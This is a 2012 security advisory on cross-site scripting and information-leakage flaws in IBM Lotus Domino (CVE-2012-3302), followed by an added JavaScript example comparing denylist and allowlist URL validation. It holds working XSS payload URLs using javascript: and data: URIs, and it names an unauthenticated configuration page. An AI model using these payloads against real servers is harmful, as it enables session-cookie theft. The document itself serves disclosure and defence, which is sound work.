Securityvulns: SECURITYVULNS:DOC:28474
Sep 03, 2012 - 12:00 a.m.

XSS and IL vulnerabilities in IBM Lotus Domino

Hello 3APA3A!

I want to warn you about Cross-Site Scripting and Information Leakage vulnerabilities in IBM Lotus Domino. On the 15th of August IBM released an advisory concerning these Cross-Site Scripting vulnerabilities.

CVE ID: CVE-2012-3302.


Affected products:

IBM Lotus Domino 8.5.3 and previous versions are vulnerable. The XSS vulnerabilities will be fixed in Domino 8.5.4, and IBM is still working on the Information Leakage and other vulnerabilities about which I've informed them.

For fixes, workarounds and mitigations, refer to the IBM Security Bulletin:
http://www-01.ibm.com/support/docview.wss?uid=swg21608160


Details:

XSS (WASC-08):

In March 2008 this XSS worked in the following way:

https://site/help/lccon.nsf/Main?OpenFrameSet&Frame=Topic&Src=javascript:alert(document.cookie);//

Since that time the attack vector via the javascript: URI has been fixed (it's quite possible that my German client informed IBM in 2008 about the multiple holes which I found in Domino). But an attack is still possible via data: and vbscript: URIs.

https://site/help/lccon.nsf/Main?OpenFrameSet&Frame=Topic&Src=data:text/html,%3Cscript%3Ealert(document.cookie)%3C/script%3E

https://site/help/help85_client.nsf/Main?OpenFrameSet&Frame=Topic&Src=data:text/html,%3Cscript%3Ealert(document.cookie)%3C/script%3E

https://site/help/help85_designer.nsf/Main?OpenFrameSet&Frame=Topic&Src=data:text/html,%3Cscript%3Ealert(document.cookie)%3C/script%3E

https://site/help/help85_admin.nsf/Main?OpenFrameSet&Frame=Topic&Src=data:text/html,%3Cscript%3Ealert(document.cookie)%3C/script%3E

Information Leakage (WASC-13):

The page https://site/domcfg.nsf, which is accessible without authentication, leaks information about the Web Server Configuration. I have seen this situation at many sites running Lotus Domino.


Timeline:

  • During 16.05-20.05 I wrote announcements about multiple vulnerabilities in IBM software at my site.
  • During 16.05-20.05 I wrote five advisories via the contact form at the IBM site. No reaction from "IT security".
  • At 20.05 I contacted "Software support". Received a formal answer.
  • At 20.05 I informed support that these are security issues (not something small, which they can just ignore) and that they need to send them to the security department. Again received a formal answer - this time with a "call me maybe" paragraph. As a result, IBM employees just ignored it.
  • At 30.05 I contacted IBM PSIRT directly. They said they hadn't received anything, neither from me via the contact form nor from support. The same as they didn't do anything (no security audit of their software) to make these multiple vulnerabilities in multiple IBM software to go to the wild.
  • At 31.05 I resent the five advisories, which they received, and they said they would send them to the developers (of Lotus products).
  • At 06.06, after silence from PSIRT, I reminded them. They said there was still no info from the developers.
  • At 10.07, after more than a month of silence from PSIRT since the last time, I reminded them. No answer from them. It looks like IBM developers have decided to ignore these vulnerabilities.
  • At 14.07 I informed IBM PSIRT that, due to their ignoring, I planned public disclosure of these vulnerabilities in July.
  • At 18.07, 12:06 AM, PSIRT answered (after 1,5 months of silence) and said that the previous day they had a meeting with the developers, who were working on these issues, and that they had started to fix them. No concrete deadline, they had just started.
  • At 15.08 IBM released their advisory (about Cross-Site Scripting and HTTP Response Splitting holes - just a few of the total number of holes).
  • At 27.08.2012 I disclosed these vulnerabilities (first advisory) at my site (http://websecurity.com.ua/5826/).

Best wishes & regards,
Eugene Dokukin aka MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
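
The XSS section above describes a fix that blocked only the javascript: scheme in the Src parameter while data: and vbscript: still worked. The following is an added example, not part of the original advisory and not IBM's code: it compares that kind of denylist with a scheme allowlist. The function names, the same-origin restriction and the sample values marked as constructed are assumptions.

```javascript
// Added example: denylist vs. allowlist validation of a frame source value.
// BASE uses the placeholder host "site" from the advisory's URLs.
const BASE = "https://site/help/lccon.nsf/Main";
const ALLOWED_SCHEMES = new Set(["http:", "https:"]);

// Incomplete fix: reject only the single scheme that was reported.
function denylistAccepts(src) {
  return !/^\s*javascript:/i.test(src);
}

// Allowlist: resolve the value against the page URL with the WHATWG URL
// parser, then accept only http(s) targets on the same origin
// (assumption: help topics are always served by the same host).
function allowlistAccepts(src) {
  let url;
  try {
    url = new URL(src, BASE);
  } catch {
    return false; // unparseable input is rejected, not passed through
  }
  return ALLOWED_SCHEMES.has(url.protocol) &&
         url.origin === new URL(BASE).origin;
}

// Run both checks over a list of candidate Src values.
function compare(values) {
  return values.map((value) => ({
    value,
    denylist: denylistAccepts(value),
    allowlist: allowlistAccepts(value),
  }));
}

const SAMPLES = [
  "javascript:alert(document.cookie);//",                            // from the advisory
  "data:text/html,%3Cscript%3Ealert(document.cookie)%3C/script%3E",  // from the advisory
  "vbscript:x",                   // constructed: scheme named in the advisory
  "Topic1?OpenDocument",          // constructed: benign relative target
  "https://other.example/page",   // constructed: off-site target
];

for (const r of compare(SAMPLES)) {
  console.log(`${r.denylist ? "pass" : "BLOCK"} / ${r.allowlist ? "pass" : "BLOCK"}  ${r.value}`);
}
```

The denylist passes every value except the javascript: one, while the allowlist passes only the relative same-site target.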